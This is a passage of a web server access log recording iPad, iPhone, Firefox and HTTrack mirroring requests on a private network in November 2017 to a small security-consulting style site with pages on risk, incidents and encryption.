"http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81378 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:06 -0500] "GET /products.html HTTP/1.1" 200 7157 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26427 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38061 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /bcp.html HTTP/1.1" 200 6651 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /uploads/2/9/1/4/29147191/601239_orig.png HTTP/1.1" 200 111181 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /uploads/2/9/1/4/29147191/4304070_orig.png HTTP/1.1" 200 57269 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Coffee.html HTTP/1.1" 200 5011 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:18:05 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/bcp.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] "GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1" 200 120188 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5012 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /contact.html HTTP/1.1" 200 6976 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/contact.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1" 200 5011 "http://192.168.0.35/contact.html" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81378 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47804 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7769 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20174 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43725 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45953 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:16:42:34 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_cyber.pdf HTTP/1.1" 200 765195 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /backblue.gif HTTP/1.1" 304 182 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /fade.gif HTTP/1.1" 304 181 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /products.html HTTP/1.1" 200 7157 "http://192.168.0.35/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38061 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26427 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5012 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /risk.html HTTP/1.1" 200 6606 "http://192.168.0.35/products.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1" 200 55344 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1" 200 5012 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] "GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1" 200 174914 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:05 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/risk.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1" 200 265419 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/about.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5012 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.14 - - [12/Nov/2017:18:18:16 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_encryption.pdf HTTP/1.1" 200 1045139 "http://192.168.0.35/resources.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /incident.html HTTP/1.1" 200 6621 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /uploads/2/9/1/4/29147191/4174185_orig.png HTTP/1.1" 200 99002 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /uploads/2/9/1/4/29147191/1888827_orig.png HTTP/1.1" 200 59026 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working.html HTTP/1.1" 200 5011 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.36 - - [12/Nov/2017:18:35:47 -0500] "GET /robots.txt HTTP/1.1" 404 503 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:48 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:49 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:50 -0500] "GET /fade.gif HTTP/1.1" 200 1112 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:51 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:52 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:53 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:54 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42819 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:55 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47030 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:35:58 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7836 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:36:01 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26428 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38062 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.36 - - [12/Nov/2017:18:36:02 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:36:03 -0500] "GET /consulting.html HTTP/1.1" 200 7268 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:36:04 -0500] "GET /resources.html HTTP/1.1" 200 7568 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:36:05 -0500] "GET /about.html HTTP/1.1" 200 7041 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:36:06 -0500] "GET /support.html HTTP/1.1" 200 6207 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" 192.168.0.36 - - [12/Nov/2017:18:36:07 -0500] "GET /contact.html HTTP/1.1" 200 6975 "http://192.168.0.35/index.html" 